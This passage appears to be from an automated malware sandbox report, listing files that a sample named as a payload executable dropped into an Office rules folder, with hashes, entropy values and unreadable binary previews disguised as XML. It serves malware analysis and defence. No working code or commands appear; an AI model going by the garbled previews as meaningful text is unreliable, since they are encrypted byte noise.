                                                                                                      Entropy (8bit):7.883171050529658
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:oXBwv0zQaCRDcRGocY4k8ZsCRgSyljGgGdKnsMsn/kOza3Nfl5rv8yv6bD:MW0zQaCReBp8ZZRryrstq3NbjrwD
                                                                                                      MD5:57A46E4832098D66F4C8705D136BAF28
                                                                                                      SHA1:E5E08CB23B9BFD3311210177D7779977BD472101
                                                                                                      SHA-256:1441D332AF21DC24A336DF6605E78EC5C23F7BB9579B10CABFA39DEB10B8D89D
                                                                                                      SHA-512:83AF49DA94BD86C8074A267E40D7D5B94EC9D97C8FA767F70D8C183F15BB73B5EAA0F0CCF2D63A0BF5FBFECF7C5540847918CF35A8D99E2C982A2EA4F10F5E42
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml6{0...P..)O-W+.!.e.8d.........h....1.} .....0r.H....`...P.o.I.0.u....>.t$.U.l....e.Q.........!.....36.pV...t..#..q..`...v.kX.y.r=4~}..@~....F..i..S....kM..#....-.9y.7a.......G...Nl.x3.....x...xb..S.. xu.lM..\N.C(X|.....\...1y"y.Y......r...OI..h....FC`..._.........Sv..%..(.z.Z).k!....$....SH..,&KaH...."..fo....L......)fE.Y.............\ ..c..`.f.B....K.@.Q.IBq.$.|.5m........#..R.........}.j].z0...........zCB....Mc..R..*Q.........jV...h...&.O.Gu..V.d_/Q..kF{....J*}j.1K.!..P..X..Re......)....Rey..A......m..<H....w[z.G.M....K.K.m.]..T]k....*eu.C3 ....... ."...sv..6wo..e...z....m.-L:y.&...R..rFk..!Um.......X...[@k..U86.X...|.?/..0......^x.{..q.-.t~.D@...\..W....f...1~........2...|\w.LQ./`.xxG...z...x.vE~...D.3...o.....-.v..l.,S..9..8.e...."..........B.Vt#.2._M@.....8...i..).ub......I.....P.gZ{...n....E.a.0k..S....1...jkI.v*....]...T.B.z.O...)0p.j.&^+....J.O....... .F.i..U.}....XY.<.qd......{(..d............e..-.2&....2+BL..../.a,

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701201v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1726
                                                                                                      Entropy (8bit):7.897310474996714
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:AwJ/tjxZyL2fW1ZG2iGLC+zBwU1ayvOxmvK0wD:A0tLffWjGd+zl10MKN
                                                                                                      MD5:8634B3116E2821ABB52FF5BF4CED9235
                                                                                                      SHA1:81AC521AAFB9DEC1E8FA9527F6A47C800DE4AF09
                                                                                                      SHA-256:E4EA604C69215308705448F6E51277B78D1359ECF5E21D0FA60AEA5669E509D3
                                                                                                      SHA-512:CF1EEA6D848AAA1381862BD8DC34C379F84605D9C353A1C2B13EB53E5FAFF3CD4975ED421F0C754DC1099E9F8FFDF26B4A1C0137F14D34FBF377AA90DA6A2B4E
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml...~..yK.6I.X|....[..=.6.....).)0....]..w.w.Od....VU....|.n7#.w.{....g%.;.........O......m.h.0(..3.X..'....N..E.....)4>.r..K>...sT1.....F....D..}C^.C....F.....0U....-7.+./...E.G......}E."fK.!P...j3U......._.[v(...W...*f.(...g..........VYZ+....L..#.....(...z.GA6wo...M...t..,..?.._.=.%pJ..Pm..N(...{...M /..o.[.S.=..!z.r.2c..2..#y.+1...i>....L..pt...K.q<?\>...!|\G.v.p....x6...~.].Th..{..}..$t.!.........*.....;.{9.........WJ..S.+.....W...-.S.)`....\!8......$...D.`.c...K....o...L.R' .....8.m..V...zs..0....iEw.......$7....fQ...]...........&V".^...sX...(..Q.>....I.%..w...*....D.I...Z.._..]....'.r..gi..?..Z....L...f...O...((<......._i.T-.G..m.......E<e.....a.;..j..}....s(.,.a.u =).^1.....]i....l^..m<.$4.C.......GR.... ~e...).@Ioz.+......@T$,..+..\....G....:.\.c...v....8.....c%.A.u.7s*...V.fdC.bR....M......'.|..`.....oV...e......@......H......R..M.]s..|.{._.......Kd.A..h.D./.m;..F.UXK.LL9....i.@5.x..p`.{....%D.oc"....u.<.(.o..3.}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701250v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1691
                                                                                                      Entropy (8bit):7.865595108910687
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:A6hyrTATn0h4XV3eLQ4fQVCc70b+EFd6bVoqwD:7Azqlu3Jb+EWG
                                                                                                      MD5:90D6C566FAFC43242439A4B79D2387ED
                                                                                                      SHA1:6F15D691560307B5573999841EE6B07C10489DA6
                                                                                                      SHA-256:D0C9C07C9D338E8C7A08BDCD29A18EF0D37ACE02D844DFF23E3CC10A1035412F
                                                                                                      SHA-512:77080CACE99F00F0886977EDD7F8EC5631BDC3173ED8BB6B4685B68588D3E130A14DDC1C2A7B78C9D52731DB221005A47ADAC0EE54A4A7E3BA4DADC295D22D54
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.....X~....c..b.R%.B.W.Q.3M......j6~....0.n......m._.......>.YP?T...cT3^....7..S..."...h.......#.48.g.v....x<G.TQC7...k....F.....&....fp.D.-...@....(........j.F.pg.|).5G%.-...A;B.z...p%.Q.. ..cw.@.%....O!.-..................^...L..K...D.I..E4?\..Z.4*.iy.A.;r.........Z3...zHgJ!...)........L\C...1.(.....l.g.O~F.9me,I..qZ..w..D..j.....,.w,.....1.5...2.=.uX,{oG\.b..T.A.;9E3...R..u.......7.|.....z...J..DC|.c..q6`5^..._...P...3.L.\.{oMy..|.2.c./3b...E... ..k.t"Pu.:dy.e!._'[..G.G....3.H..=..4j4.y.r.C.$....?...~..P....p%.p5..`..!Q.....d0....|k.."....hq.If|.3.y..\..m..Vj..8....)...._.b...W.B.."./..3......Lg.4...9z..N...Q...p......f....G~D.....zj{uei.Na..E.......A..^...J.q.m9........3Z(5.d..z...o....Z.....\^........;...8.].. LL.~......zDz.m..{S&..?AI.N...pCg.....Q./.....+.d_...S8|..y%..X.b.D<.........I`..iIO..H.f...A4<....qzl?.+&....q..5....m.9r0>..mp..3,V.BW....9..XX.......$...X.vz.s0...z@.T.E.f.D..A......^..*#AJF'......R..

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701251v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1728
                                                                                                      Entropy (8bit):7.890230622885775
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:v7KDGnttvp+ZYCqM4ivCxlt+lAP7jlk8LcYwD:vVtiYZvfEOP7R9wh
                                                                                                      MD5:659BD103A5EBD0E7A27F1DE2ED39EAB0
                                                                                                      SHA1:9433C0C27B011EEC1C1307A31C671ACB115326D0
                                                                                                      SHA-256:4A9FAE97C2D849CFBDF5FCD952D4F197532654ECD914A4AB5EA0686E9E2A5264
                                                                                                      SHA-512:608F25B8299EAF90662DEBC3CE7ABB4A49E14AE1CA84D1C72D8C79583CDFF471D97B50A748C7939B320C2E87B8816AA497BF5758DEFB49357DBF57B48B5EC096
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml...tZ.$..# m.....(s"..,$i9.R.....$].QLA.B/.W......X............+.....1y..n.|.oM.x..1E7.X<..(....W....)H.,.V.v..... ...w.`vO......p....r\:.9.E.f..0.c@.T._6...Z..uY...w..MO.\.:>E...._...'P-...L0....i. 3..T.@6.@.K..ai-..*.7..yG/...N.\.kL....]?..}9.e..H/.....s.t.._X[K.....z....X.x+.....&...&.D...W..c.SG.....'SU/=d:...FL..Y.o>.t{...*/............I..U'.F7o.2.m371.F..N.'..;..........'...!a..`.l..|....~.?#..y1.,... U1.2.. ?1}...`..3T...P.v!..1..?P.\..[.XP..<..."Ph.R(..@.....Eu...R.:.4A.z..B..e d.o5.'...f..N0.....s..=y.....l}F.{..c.l.oo.....r..v.X1...e......T......IG...x.....s9.......*2....4W.z..a...$..n......V(U...^C.B.....0...@.|\.qy-.D..N.X....7w6.........Z.f.f.....`Mz=y.......e.....,*"..@..r1z.C,.l.U...@..C.H.E....f.ZkC.I.O.=8\w.K...c..^E.4`Z.r..A'..A.6..X.........y.....p..agA./.r.l.x...,.R....Bpk.,V....k..F,.....h..;^...(..!.j...y..%.++....%q.4..K%......g....2..).C.|..}k..7..E.h.E.q...u..T..[........^N.2S...J.Q`.[....<...,

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701300v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1699
                                                                                                      Entropy (8bit):7.895506570198203
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:owhw+YECO41iKcSZY8RIT5JFSXOuqGj1pPIwD:owhwCCh7DZAxa3rPR
                                                                                                      MD5:40E3C330A0643F13F65F0ADBA54D7539
                                                                                                      SHA1:6EC5E917AE2631B65C46F9EDF6510D3E0E9FC72D
                                                                                                      SHA-256:105A3BC469D8850CD58429CE2D458C6F577F060BB739E2F43EEEDE4847126D70
                                                                                                      SHA-512:D9138E7FDD1D1F8D86E985AA89CDEC681C1A12266FB265ABD066F7F95AA275554CE5E2CF67EACF2E14A590A406F425A9735259A160B2FB2C2759767999F4A22F
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml....A%T......VM.Q...y.WX.p........A.u.9.........G..&F..Sd.........D@..VD.ie.K.."DZ.aG....`.o...;..p....0z....?....S.;.?.-.?A0.....hxb.[.m.|\a..zE....;L.b.n4cx@n..q...."..G/....d" W.5`...$......C.Chs....r!..`..'..D.s.R..zP.9A...#k.zu..$.H......X?C..u....V.....M.4...C....HH.....t.-B.b..U........../LR*.kpP...|x....a..#.-.i..}S.J.>,.....^....;...&*....W..|rZ.r....L..r..<d...RBJ.W....V].e......)IxD@...b.q.j..v..S.$1[v..N;f..,==(N.....H.....hO../cX.......~YBX...1U#m....Y....."...`.l`0..^........Z.^.....e.TF..*.2..i.fW..+...Z..~h..=KC..A..C..y.6{M?..+..S^.".....o.I.7....1:_.......vM(.r."..b..3....>.W..%US..!.. .hW..a|.a..!..N...;3...fM/...........#.9k...a......P....,.. .p...z.-5o...?...u..[.J...:.).Z..Q1...~y..O...;I..i.4J..U....s%......&=.TW."!.o..s>.2.4.Kg.Y..Q..\.N.Qlf~.>..ZL.9..............s..K...2..T.?#...}.-...`..IVI.(.!.W..P.b....dO.X...d...!.aJ:.....)X..m.Y......V.7.u.w.=.."....*.....c=...*...Y..r...`.5O...".{cLS...>lE ..C.b^.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701301v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1736
                                                                                                      Entropy (8bit):7.879370828860149
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:8q34V0rn+LNbwTLr3mWLhrinBRKLhKWk6CHvvcWBOAyx9EQ8wtY2sP6E/OLdh9hv:H3zrn+xbALh0UhKWJ21AEQ8c/EcHAwD
                                                                                                      MD5:65EB6E83D4321A167BF42180BFAEE96A
                                                                                                      SHA1:DBFCB0299A33EE50E8F0C228A65FFB1C496108EF
                                                                                                      SHA-256:E0133090723DDCFC9E7E314BEC9EA0B58004E98A3901672DF533E6122C5EE8CA
                                                                                                      SHA-512:8960B53A3E52D4A8166204F29B30F70131E2E23DD6750C037156A09F5C8886B09C698B7EE90253813CF2171E2FD3955EBB6A049DF6526DBC5D9983D9197B8DDE
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml..t.A&..8..d.."zK .OU #.(........G...7.T..u.6.[x!GE.4.....W!...."g...W..J.<...Xx..M]..6.K{j.....+._d..Ms...Q.E..............P.....(.6.....#..M<...L.....m".4..{Q....Y....#.N.dB....}#.(Hl.Q7....57.....o..2k..:M.!B.|....k. .....{].....;}n....(..<.Ub..T>.r.o....n.....55._.]^.Z..5%..h.k=.e......!....(u......;.z.V1.+.Z.o.f.0.......x....w.......@J..../..4c........?.8-.....s.M..]=S)S.n.MQ.....X,|&.5[!}.n....oA....0.X..LRf..K..c.../.../c..W..S.L.P>....F.I.,.I&.....Y..T.#>HPX....t.W...Y..]i4..t.G....8..,!M..yp.w.....)....-.vX...qYD5.9.2x...R..-.......t....J....:...lQ.......d..)...^..ns`.u....XTX.f... ..|7.c...L..Kg....q...9. '....w..u..-.U*&?.=_....<..o..VYC...... ^2I}....q..B..k1e...A.M.{(.?..k.....r..............2.'...A..~.#..O=h...IY..+.E...H.sG..~....N..W...$&...(.D..(:gNC..."..4{.....6(....#.v.hw..i..j....5..D...8.+6....7..FnW.~.y.....qk.....`.K.`...H...c`..>..+...b.I,.n))3.-ls.K..@....E..".4....\..t..........2.-c.V+5....{8t..N......T...S,h.'..1....kM

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701350v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1703
                                                                                                      Entropy (8bit):7.884297416579675
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:6y61/GPEcdEDPT4JlfmC3B/bCBLqub3ezL87wD:co8cdEDbC3hCBx3WL8w
                                                                                                      MD5:211FE8BB0689EB32DB5ADE46F42174A0
                                                                                                      SHA1:5D043F8D7F2E40B8DAA191ECEF7560F01147B25D
                                                                                                      SHA-256:9C45B88DE1805B079B984CD13C6950341B7969BE4B1527700B48079A430AF07F
                                                                                                      SHA-512:B43D4056C55F44268ED4960BD5BDB6E206A8283EB0006EC7E60D84E8A87F4D9594BB885A173ABCDC53054A6E76EEB505FBC217629344FC3AF22D9AAB7246E57E
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml{..8.,....ep.....@6.V).P..\D.%.b.g.|....?.B.l.q3...W1C7$..<r...c.o....UGI..5~.....<.<01.*......[.R...F.....d....j....../.S..!...n........5$k\ o.u.>......!niV#.x.H..2R.rEK=.`.........tt.&..g..I...P%.o...N.].t.&dj.J=<..._.......9.>..N.....L~.5:(.Y......@.=.[..G.J\Mm.u.0j9..t...p..b.&..X.V..:6.....c.H&...".....Y..fP..B...Q.....Nk........b..gv...#.....(0....u.e.....o!S.9.D.....yg..O..16...4..)q}.Jz..f...\"........*...z...EV....w..r.vO..D..m`.A)...k.D\U.x...s....I..t.5m.<;..Y..h.,I.<..>..$UM.A.wb.......t...k.ER..]..s.h.;V.@|.Z;...b.R...E.........\=I...(..#.K~...7..u#......c....Q.t..nf..~..S...Q.Ypq..V..).;...I..C.fq....U .l./X.."3d..^(L..0..!t.{........r...%Z....DvB...=.9.{.B..-......0....c.V.....s..z....'/..#. .1....<i..(-....sI....!..f .q.m.CUX$...z.N.....{.....z7.0......0.Pp....S..M"N[/...D..b.G..`..<.RL~<#.N.7.T.'.?.va..Z.o..u._.k=..JPfX...^.D#%>K..d...,.....-.4....p.[.J.r:.b'.........[g:.#.i.$.j...f..Z..Vd...4....Y.69.`...0.l.t.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701351v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1740
                                                                                                      Entropy (8bit):7.895356658586758
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:wiPKfWKFEmXXno4pNGhkCOzg4EHkulT96GfyupwD:wi6dEaMkCOznruprm
                                                                                                      MD5:E3D5F68EE8789652C61002D6468E5DF0
                                                                                                      SHA1:63CC8B6C6629D00DBE9F6946B30B29F8270657FE
                                                                                                      SHA-256:5D44A509223A03E931746B6DFE09CA79F921CF06074584315ECDC83833E14B0E
                                                                                                      SHA-512:86BC57696204BB25DB5E22A4EC5F61474D5056276F7F1ED81C7C31E3EC268BCEB47D2D595C9E9E8B2ADE4AED541CBE4BA07237C0EE5E649E9201830E632032BB
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml...;.GrV&ed...}.\....$aE..,`'.%F-.S..f.i:....>..c...5?..3...D"...$Iy.,u..o....hmO28..'... .lc`m.X..z!....OH.Lp..+..Z..z.....+...6.>{f.~.,'P(.=..q..T..1....SN..#...&..ax.*a.]P.|..|W].Sm....u`.7.SB.n.....p.M.r8[Gx.. .8YZ...a....C]_..CI=.[.xL.GTNm.^....Rv4.....C..f.6.....p_..4.-...{........LL.....Q......../\~[..P"m>..........m...j.Pzg.I..m.].G.....:h.......w.a.I.Q.8.`Ex`......;..._v.:.BV....\C......A.6.6Gy.....;.C..W.a.}..Lg......U./g$....s@.,.e....W2...KZ.D].....d.t...I->.W9.U.....Ie.l/3...^9.....>.+.......d..U..r...#...T......K ..m.66Eh.......-f..>....xP..3.2U.Pt.... ....)5......m.......[mN8i...r)i."...dI.w...{...@]{.......A-.HQ......j....`.D..1t.....I....\;.\F.p..44....h.U.\?.:U*..D.."..'.Aj.L....{.:z.9 ..YU.S.D....cX..w.k....o.........}{..3.[......&./...{xT..J.n#.W)...=.6....R[.k...+.......q,C.f.<..@f...e....r......U.N'.$k$.j....b.K...0Y..6y..kg......F..*.N...Nl+=s..,..6.%...u<FS=.....o#N.......v3S'.p.g.h..A2...A...M.}.:*b..e-.....g.b

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701400v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1697
                                                                                                      Entropy (8bit):7.889397759456404
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:zQm3hbV6zjLnRXH2L6McVEqeILUNM3DwD:zRhed2UVfzF4
                                                                                                      MD5:8C484EB9263885CFC9553E5AB0F185DC
                                                                                                      SHA1:D990364AA7F3D3A0DCE275BA0FF739AD027F3E0A
                                                                                                      SHA-256:F9B47A4C7E05F7BB9006E669067B3EB72B4949E0BF7DD9416DDB3BEED2731D77
                                                                                                      SHA-512:C36D2E0940C29DA34395695736F307EF0EC4E8D324052C84AE2B22339257041E34B2B22986521A3671B5C2B0360FEB88C2094451EECCF39F8AA13ADEBFC0ADF9
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.=_.....V>.*3.#........q..g.G..b.a....!.] .vE.3v..Ip..``...mUj4....mPEy..v....C...].;..:.).x.......E.Y..f.np....7..=3......Y.T._l.GX...%1.(^..x...8B.g.".....iu. ....q..8].=$3.!..,D....7...0...C.<x|...4..6..mj/.)k{.|........FZh...:.C.,~L....B}y66 .'1..>3X.#...h....m...0... =.......I..D..-Z.t5.^;j..(J.........[.5}.A....H..+s.6>.mh...2[...RY.F...gd00... S.>d.XA#..0..$X{P..%[D......+4^...wb.!.[|...es.K$.kp.p.Q'|.......uS8..!.......a..#.!......&w.....r.....X....f.\g.....i..n.,..j....P-E.k.Y.D...............a^.1Re..p..Q......W#,|_..b...48........,?#.!..G"...{....I...... /Tc..Q......^b".YI.....Vx..ITRz.}EJv..1...*A@~..o..c..&.=.e...@I..64..!...<C.."............9W..!...F.A.8......e.4c...kr.Y..=..F.*W..[.0Z.*.J..>.....TM..s..(0".6......t+6.j.7@R.y......g.%.Xj..[Qz".SI^.....h....L.4..N.6.V. h..'G..8.........^i...5.kA...DP..c........94.+v-.j...i.wf}J..9..M!$+[%.iS....cB.l},.{.....1;.X[.V..7.t....+.....K"*..0e..K.....3B....q..R"

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701401v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1734
                                                                                                      Entropy (8bit):7.900860244293034
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:QMeU/vsAuWG3EdOF4VaYKeLbS/O5wyfzDlwD:Qc3s5WpAglL2/Ty3G
                                                                                                      MD5:938B6CF06DF89A3F4E80742B3DE729FE
                                                                                                      SHA1:5CC4D82CF4285112056F22F21F60FF42E9E2317A
                                                                                                      SHA-256:2C056821B027B638D9DA6D4F23629323511E738196BE48D7ECADAC562E6BC522
                                                                                                      SHA-512:FA19AD5F803555D4B8A7DACF1E0569D73D3E55EE8F7AE470F297EB5AB3D841014B94F81AB527856F6FC8AB55D88E000B737BB7367426F7700D45737732A289CE
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml-n.?....ygj.,..N.E..b..;*...&..........._....c..5..o.6......F..si6.N..F.n>...#k........%=..{.o.IH5.c.0+.LCw..I.+..c..8......a....~.[8D......|..L..r....._{wV.V|.tb......:.......!.gZ...^....".s4..{..S}..{*.&..o.@p..(.L"...E.`..."d.C~.\....Y.6...Z.D.m;>..#\._".x......}>l.-.CR..;..cdU..d....2....L.....<K(..v.d..5#.j*k.$.^...@X.K.+..=.0......hH.iA;Spu.ptuQ......`Q.Y..-..K.N.0=..J[P.l.~..Fy..^.G.9....t......[.,.. .....l.g.a..k@2FnQ}bI.0.."....D...&)5..............a.j+.....{..r.K8..V./..wR_.`YZ.HR..\G.y.P.A..X.....9....|..d.k....4-.8..#.8...t...).>g..N#*.4.'.=..*U...:...=..,0....x.!_.4...G.)...d.,..I.....zzVb4...J.....E.M.+..QA.|c............v..X......1...CKYJ...-.@#c2G.ba.7.z.....@\......I......A...DlW.^...K.*Mx....&....`....i.@..V..7..nU.Q...........P......H}?i...g.J,.j..5..B*.te.?&..~c?.lW......<.@B..........6..\)...-.H...aQ<..b.'L)2'..oT...J........J1..x..FK^....Z".O...=>hN.........p..W..I.3.Tg....ut..h....b.Y....d.R.\^..0.cL

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701500v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1697
                                                                                                      Entropy (8bit):7.879588039355181
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:+3/VUfmbfR13Yr+GB6Cy3Me8K9NHpmssJLD0k9VvIQvnlKRV1Lsv6bD:+3j37I6Cz9mNHpmHJE+vVSHwwD
                                                                                                      MD5:E05E57BD9F83CDF4F6F777C20F8E9B85
                                                                                                      SHA1:A5A78E43D799A142ECE6EBCE4B0BA6D36FDB0291
                                                                                                      SHA-256:6281A9663A825D0CB0B57BAA112BBBCF6EB1D2E32465B20005C9F5DB437D7868
                                                                                                      SHA-512:3452CAF88E4E6A41F2555FB7CB0F646129B2BB795E710896155AA3DC3692DB0C45AFB57140B81FE34806E775210566735772B43117999D78EAE184AC7596096B
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml..M....).+@....}qE......].&j..zU.I..."G...5S.e:%.D......L....D.m.%..FM....*.r..g..=j.@P...A.l.O..'.c...<.%iW...RQ..|.o.B....Z:2&REv...%z.M...z....T..Z....f#...!.U.{..O...s:m.=...b.....?..&...#.....!.r^...h..X..D\p0..<.-.x.X.".;.......c..[.|...u..8.S...b..E.}u..m.\....I....f..q....`.Y.n9g.@6.%...5G.*.n&.*...#.{..5:..-...P..of{..!!......m.ALuv....J.z.Y..v.......E..#mc..!.U..lTH...2...4..P.......=.K1.et..?..O..jz.*.J.....,....Q...t...;......p.xmf.B......).).._L...4.0.6..X...P.......U..U.W. ...g.;@&..Z...mr..Enl^.)._..y.m.'.../..........>(}..{0.&.}..q.P....~9..c.c t..Ab-.V...}....|?.w.h.SA.16..Qp*...(~AR.....!h&M....K.)Y.Q.........%..0Wlh....t@V.....i..7...xX47.}9~.............3.}...K........!..4.m(qx.].N...m..Yi.r.....o.J.@|7...1K...(h.B?.9at...$...kK9..Yv..wPZm.....le...6C.O..=..b......K....NW.K.EJ....-.:..i...`.E....;...D..G..O..\...A.g.OxwCq..A6.?.[.v.........XmQ....>.!.ISg^.Fs.}X..u.I@T.....'..y...V....z.XnW.G....Z..a....B...8.R..{..A;.+.9.g..

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701501v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1734
                                                                                                      Entropy (8bit):7.880620259060599
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:FR3/AQ/+ORvG80IE4DjAMIfN8zr62GDwD:FeQ/+wt3ApNeGo
                                                                                                      MD5:7F9A1A7589DC9C839E2A76213C975801
                                                                                                      SHA1:898282D0F17B0CD83AE48902E3E63B37423E186E
                                                                                                      SHA-256:E1BF7582EB0A5160EA6BBABFB204BF6C57722A6E618D62ED8F4CCD3B15AD132F
                                                                                                      SHA-512:6CC3E861A2CDD3FFC099504CD945C064D9C4790836874328AFC67F0780E7352095A48778447FD980C6B4D3481FD4BBD46FF44B94A7B99A90D4D889665A89E7F9
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.j.dV..KuC.ug.....z`........bK..x~..c$...o5).F|..H0b.d/S.?...wEQ.^....{o.......B....$...@.....-.>.T/h........I.4.\........i-.j.u>9dpr.#.=C.{..6=.4!R%..R9....O/.7...p.k...XX_...h...k....Aa.P.6|l....o.\"..U1_....mx....%..G..4.:o.T...9.PZ...a..#...^.79.^:..N....H..!...KJ.-.w..Z...&M.+.._+.;.x.....Pj.S......_/>c.>.m......TnqZ\n.g.".m./.$]..b,..B7K.........h.i.....f.Tu....qq........ae.d...*id...6t.u..y{..VaB....D.......^.^&K.C......2_...ma....i...I....5.......4..pd&%....g.GQ..&M,a.Y.`Y..C.....=5...H.w....MH.8..R..3!......X!..R'3...<O5.e.J.R.Q.l...~..gw..H.~.d...3.o..s.'E?...',mp..S...w..O.x&YL.S..p....A%^...T..6.y*....!..%..,......qCH..LV.*\..g...Yb.I.4..{N...}d...k.....o1.... b.}..!...~rz.0.[..V...c....`..z..?.:....|./.T......@...3..._.3q...H...@......vL....k7.S..../.,.s_a7.Q.!..Ba.....J.9=.q[:....$@..0..y.W&.....z..E..Z.~.....2..f4. q.j.;.T.Z.eg.O..cHM.y..7.m.......{..Q.P.0.....C.rg......I._...:;...l.T..R..=....... |j..s..0s....

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701550v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1701
                                                                                                      Entropy (8bit):7.8836617239564495
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:P70uht4R37SQzTouxkbP7WcuNh9VLs7MHgXu2wD:gmtI71ToumWcu79VLsVC
                                                                                                      MD5:409169E2254D20DE0D801BA84EAEFFF8
                                                                                                      SHA1:2C7DDBC776979AF85155C1FA2D0692C8CA8CC44F
                                                                                                      SHA-256:07CB6A5B0DE8B469381EF9CFC429E41C5578C2EDA0515E224050DC8EB94D570C
                                                                                                      SHA-512:364A66FFD6D395E61B4A32F17EBD5BFBB7DE574BBB08FEB2A144DEBC62A037EF103F5F96E488A130E8EC0F16B4150D2084CC72C0E4E15BB904ED08187AB6DB69
                                                                                                      Malicious:false
